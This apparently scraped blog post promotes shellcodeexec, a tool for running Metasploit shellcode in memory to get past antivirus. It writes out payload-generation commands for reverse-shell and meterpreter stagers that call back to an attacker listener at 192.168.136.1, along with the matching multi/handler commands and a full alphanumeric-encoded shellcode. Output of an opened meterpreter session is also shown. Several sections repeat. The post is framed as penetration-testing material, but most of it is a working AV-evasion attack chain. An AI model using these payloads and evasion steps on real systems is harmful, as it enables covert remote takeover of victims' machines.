Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
Or for a Windows target:
2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
Or for a Windows target:
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
Or, on the Windows target:
Download shellcodeexec (inquisb-shellcodeexec.zip) here.
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:
- Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
- Can be compiled and works on 32-bit and 64-bit architectures.
- As far as I know, no AV detect it as malicious.
- Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
- It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
- Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
1 | $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX |
1 | $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX |
1 | $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E |
1 | $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E |
1 | $ ./shellcodeexec |
1 | C:WINDOWSTemp>shellcodeexec.exe |
2nd:
Background
Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.
Description
This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.
Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.
I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.
So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!
Features
- Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
- Can be compiled and works on 32-bit and 64-bit architectures.
- As far as I know, no AV detect it as malicious.
- Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
- It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
- Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
Example
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA
2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:
C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA
If you head back to the terminal where the multi/handler is running you will happily see:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E
[*] Please wait while we load the module tree...
[...]
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 673 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12306 updated 7 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 4444
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011
meterpreter > sysinfo
System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.
Thanks for reading
Regards
Sarvesh
Thanks for reading
Regards
Sarvesh
No comments:
Post a Comment